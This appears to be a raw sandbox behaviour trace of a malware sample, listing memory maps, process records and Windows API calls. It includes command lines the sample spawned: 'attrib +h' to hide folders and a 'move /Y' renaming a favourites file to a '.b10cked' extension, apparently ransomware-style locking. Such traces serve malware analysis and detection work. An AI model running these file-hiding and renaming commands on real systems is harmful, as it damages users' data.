pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 31084 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = 
"pagefile_0x0000000000040000" filename = "" Region: id = 31085 start_va = 0x1f0000 end_va = 0x22ffff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 31086 start_va = 0xbc0000 end_va = 0xbc6fff entry_point = 0xbc0000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 31087 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 31088 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 31089 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 31090 start_va = 0x7ffd5000 end_va = 0x7ffd5fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd5000" filename = "" Region: id = 31091 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 31092 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 31093 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 31094 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 31095 start_va = 0x1a0000 end_va = 0x1affff entry_point = 0x0 region_type = private name = 
"private_0x00000000001a0000" filename = "" Region: id = 31096 start_va = 0x420000 end_va = 0x51ffff entry_point = 0x0 region_type = private name = "private_0x0000000000420000" filename = "" Region: id = 31097 start_va = 0x6dc00000 end_va = 0x6dc1cfff entry_point = 0x6dc00000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 31098 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 31099 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 31100 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 31101 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 31102 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 31103 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 31104 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: 
"c:\\windows\\system32\\user32.dll") Region: id = 31105 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 31106 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 31107 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 31108 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 31109 start_va = 0xc0000 end_va = 0x187fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 31110 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 31111 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 716 os_tid = 0x898 Process: id = "516" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea16940" os_pid = "0x9d8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "512" os_parent_pid = "0x9ac" cmd_line = "attrib +h \"C:\\Users\\Default\\FAVORI~1\\Links\\desktop.ini\" " cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], 
"BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 31112 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 31113 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 31114 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 31115 start_va = 0xd0000 end_va = 0x10ffff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 31116 start_va = 0xb90000 end_va = 0xb96fff entry_point = 0xb90000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 31117 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 31118 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 31119 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 31120 start_va = 0x7ffdd000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdd000" filename = "" Region: id = 31121 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 
region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 31122 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 31123 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 31124 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 31125 start_va = 0x1f0000 end_va = 0x1fffff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 31126 start_va = 0x280000 end_va = 0x37ffff entry_point = 0x0 region_type = private name = "private_0x0000000000280000" filename = "" Region: id = 31127 start_va = 0x6dc20000 end_va = 0x6dc3cfff entry_point = 0x6dc20000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 31128 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 31129 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 31130 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 31131 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: 
"c:\\windows\\system32\\kernel32.dll") Region: id = 31132 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 31133 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 31134 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 31135 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 31136 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 31137 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 31138 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 31139 start_va = 0x110000 end_va = 0x1d7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000110000" filename = "" Region: id = 31140 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 31141 start_va = 0x76ca0000 end_va = 
0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 717 os_tid = 0x5dc Process: id = "517" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea16940" os_pid = "0x808" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "512" os_parent_pid = "0x9ac" cmd_line = "attrib +h \"C:\\Users\\Default\\FAVORI~1\\Links\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 31142 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 31143 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 31144 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 31145 start_va = 0x90000 end_va = 0xcffff entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 31146 start_va = 0xf70000 end_va = 0xf76fff entry_point = 0xf70000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 31147 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" 
(normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 31148 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 31149 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 31150 start_va = 0x7ffd7000 end_va = 0x7ffd7fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd7000" filename = "" Region: id = 31151 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 31152 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 31153 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 31154 start_va = 0xd0000 end_va = 0x136fff entry_point = 0xd0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 31155 start_va = 0x240000 end_va = 0x24ffff entry_point = 0x0 region_type = private name = "private_0x0000000000240000" filename = "" Region: id = 31156 start_va = 0x2c0000 end_va = 0x3bffff entry_point = 0x0 region_type = private name = "private_0x00000000002c0000" filename = "" Region: id = 31157 start_va = 0x6dc00000 end_va = 0x6dc1cfff entry_point = 0x6dc00000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 31158 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: 
"c:\\windows\\system32\\kernelbase.dll") Region: id = 31159 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 31160 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 31161 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 31162 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 31163 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 31164 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 31165 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 31166 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 31167 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename 
= "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 31168 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 31169 start_va = 0x140000 end_va = 0x207fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000140000" filename = "" Region: id = 31170 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 31171 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 718 os_tid = 0x7d0 Process: id = "518" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16b40" os_pid = "0x9cc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\Default\\FAVORI~1\\MICROS~1\\IEADD-~1.URL\" \"C:\\Users\\Default\\FAVORI~1\\MICROS~1\\IE Add-on site.url.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 31184 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 31185 start_va = 0x30000 end_va = 0x33fff entry_point = 
0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 31186 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 31187 start_va = 0x110000 end_va = 0x20ffff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 31188 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 31189 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 31190 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 31191 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 31192 start_va = 0x7ffd9000 end_va = 0x7ffd9fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd9000" filename = "" Region: id = 31193 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 31238 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 31239 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 31240 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = 
"\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 31241 start_va = 0x320000 end_va = 0x32ffff entry_point = 0x0 region_type = private name = "private_0x0000000000320000" filename = "" Region: id = 31242 start_va = 0x3d0000 end_va = 0x4cffff entry_point = 0x0 region_type = private name = "private_0x00000000003d0000" filename = "" Region: id = 31243 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 31244 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 31245 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 31246 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 31247 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 31248 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 31249 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 31250 
start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 31251 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 31252 start_va = 0x210000 end_va = 0x2d7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000210000" filename = "" Region: id = 31253 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 31254 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 31255 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 31256 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 31257 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 31258 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 31259 start_va = 0x4d0000 end_va = 0x5d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 31260 start_va = 0x5e0000 end_va = 0x11dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005e0000" filename = "" Region: id = 31261 start_va = 0x11e0000 end_va = 0x1342fff entry_point = 0x0 region_type = pagefile_backed name = 
"pagefile_0x00000000011e0000" filename = "" Thread: id = 719 os_tid = 0xab8 [0212.079] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x20f844 | out: lpSystemTimeAsFileTime=0x20f844*(dwLowDateTime=0xb338c5c0, dwHighDateTime=0x1d440a9)) [0212.079] GetCurrentProcessId () returned 0x9cc [0212.079] GetCurrentThreadId () returned 0xab8 [0212.079] GetTickCount () returned 0x3b7c9 [0212.079] QueryPerformanceCounter (in: lpPerformanceCount=0x20f83c | out: lpPerformanceCount=0x20f83c*=26886796852) returned 1 [0212.079] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0212.079] __set_app_type (_Type=0x1) [0212.079] __p__fmode () returned 0x76b331f4 [0212.079] __p__commode () returned 0x76b331fc [0212.080] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0212.080] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0212.080] GetCurrentThreadId () returned 0xab8 [0212.080] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xab8) returned 0x38 [0212.080] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0212.080] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0212.080] SetThreadUILanguage (LangId=0x0) returned 0x409 [0212.080] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0212.080] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x20f7d4 | out: phkResult=0x20f7d4*=0x0) returned 0x2 [0212.080] VirtualQuery (in: lpAddress=0x20f80b, lpBuffer=0x20f7a4, dwLength=0x1c | out: lpBuffer=0x20f7a4*(BaseAddress=0x20f000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0212.080] VirtualQuery (in: 
lpAddress=0x110000, lpBuffer=0x20f7a4, dwLength=0x1c | out: lpBuffer=0x20f7a4*(BaseAddress=0x110000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0212.080] VirtualQuery (in: lpAddress=0x111000, lpBuffer=0x20f7a4, dwLength=0x1c | out: lpBuffer=0x20f7a4*(BaseAddress=0x111000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0212.080] VirtualQuery (in: lpAddress=0x113000, lpBuffer=0x20f7a4, dwLength=0x1c | out: lpBuffer=0x20f7a4*(BaseAddress=0x113000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0212.080] VirtualQuery (in: lpAddress=0x210000, lpBuffer=0x20f7a4, dwLength=0x1c | out: lpBuffer=0x20f7a4*(BaseAddress=0x210000, AllocationBase=0x210000, AllocationProtect=0x2, RegionSize=0x2000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0212.080] GetConsoleOutputCP () returned 0x1b5 [0212.080] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0212.081] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0212.081] _get_osfhandle (_FileHandle=1) returned 0x7 [0212.081] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0212.081] _get_osfhandle (_FileHandle=1) returned 0x7 [0212.081] GetConsoleMode 